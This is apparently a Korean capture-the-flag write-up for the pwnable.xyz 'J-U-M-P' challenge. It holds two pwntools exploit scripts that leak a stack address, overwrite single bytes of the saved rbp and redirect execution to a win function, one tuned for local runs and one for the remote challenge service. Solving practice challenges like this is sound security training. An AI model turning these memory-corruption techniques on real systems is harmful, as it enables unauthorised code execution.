pwnable.xyz / J-U-M-P
lok2h4rd
2022. 5. 15. 22:59
스택 주소를 릭할 수 있고 rbp를 1byte overwrite할 수 있다
rbp 계산을 잘해서 rbp-0x11을 1byte 변조해 win 함수로 만들고, rbp-0x8로 이동해서 그쪽으로 jmp하도록 하면 된다
로컬에서는 되는데 리모트에서는 안된다...
ubuntu 18.04로 해보면 익스가 되는데 오프셋 차이인 것 같다
ubuntu 20.02
from pwn import *
#context.log_level = "debug"
#p = remote("svc.pwnable.xyz", 30012)
# Local run: spawn the challenge binary directly (the commented remote() line
# above is the alternative). The 0x108 constant used further down is tied to
# this local environment, as the writeup notes.
p = process("./j-u-m-p")
#gdb.attach(p)
def ovr_data(data):
    """Wait for the menu prompt, then send *data* as-is (no trailing newline)."""
    prompt = b"> "
    p.recvuntil(prompt)
    p.send(data)
def st_leak():
    """Select menu entry 3, the option that prints a stack address; the caller parses it."""
    prompt = b"> "
    p.recvuntil(prompt)
    p.sendline(b"3")
# --- 1. Leak a stack pointer and derive main's frame from it ---------------
st_leak()
p.recvuntil(b"0x")
# The leak is consumed as exactly 12 hex digits; a print of any other width
# would be mis-parsed here.
leak = int(p.recv(12), 16)
# Distance from the leaked pointer to main's saved rbp. This constant is the
# environment-dependent part of the script (0x108 here versus 0xf8 in the
# 18.04 variant below), which is why the same script fails elsewhere.
main_rbp = leak - 0x108
target_ret = main_rbp - 0x8
for label, value in (("environ", leak), ("main rbp", main_rbp), ("target addr", target_ret)):
    log.info(label + ": " + hex(value))

# --- 2. First single-byte overwrite of the saved rbp -----------------------
low = target_ret & 0xff
# Only one byte is written, so bytes() raises ValueError when low + 0x11 does
# not fit in 0xff; the script does not handle that case and simply aborts.
first_stage = b"A" * 0x20 + bytes([low + 0x11])
ovr_data(first_stage)
p.recvuntil(b"> ")
p.sendline(b"123")

# --- 3. Second single-byte overwrite, then hand the session to the user ----
second_stage = b"1\x00" + b"A" * 0x1e + bytes([low + 8])
ovr_data(second_stage)
p.interactive()
ubuntu 18.04
from pwn import *
#context.log_level = "debug"
# Remote run against the challenge service; the local process() line is kept
# commented for debugging. The author reports that the 0xf8 constant below is
# the one that matches this target.
p = remote("svc.pwnable.xyz", 30012)
#p = process("./j-u-m-p")
#gdb.attach(p)
def ovr_data(data):
    """Block until the menu prompt appears, then send *data* without a newline."""
    p.recvuntil(b"> ")
    p.send(data)
    return None
def st_leak():
    """Choose menu entry 3, which prints a stack address for the caller to read."""
    choice = b"3"
    p.recvuntil(b"> ")
    p.sendline(choice)
# --- 1. Leak a stack pointer and locate main's frame -----------------------
st_leak()
p.recvuntil(b"0x")
# Exactly 12 hex digits are read; a leak printed with a different width would
# be parsed incorrectly.
leak = int(p.recv(12), 16)
# Offset from the leaked pointer to main's saved rbp. 0xf8 is the value that
# works against the remote service (the local variant above uses 0x108).
main_rbp = leak - 0xf8
target_ret = main_rbp - 0x8
for label, value in (("environ", leak), ("main rbp", main_rbp), ("target addr", target_ret)):
    log.info(label + ": " + hex(value))

# --- 2. First single-byte overwrite of the saved rbp -----------------------
low = target_ret & 0xff
# A single byte is written; bytes() raises ValueError if low + 0x11 exceeds
# 0xff, and the script does not recover from that.
first_stage = b"A" * 0x20 + bytes([low + 0x11])
ovr_data(first_stage)
p.recvuntil(b"> ")
p.sendline(b"123")

# --- 3. Second single-byte overwrite, then interactive session -------------
second_stage = b"1\x00" + b"A" * 0x1e + bytes([low + 8])
ovr_data(second_stage)
p.interactive()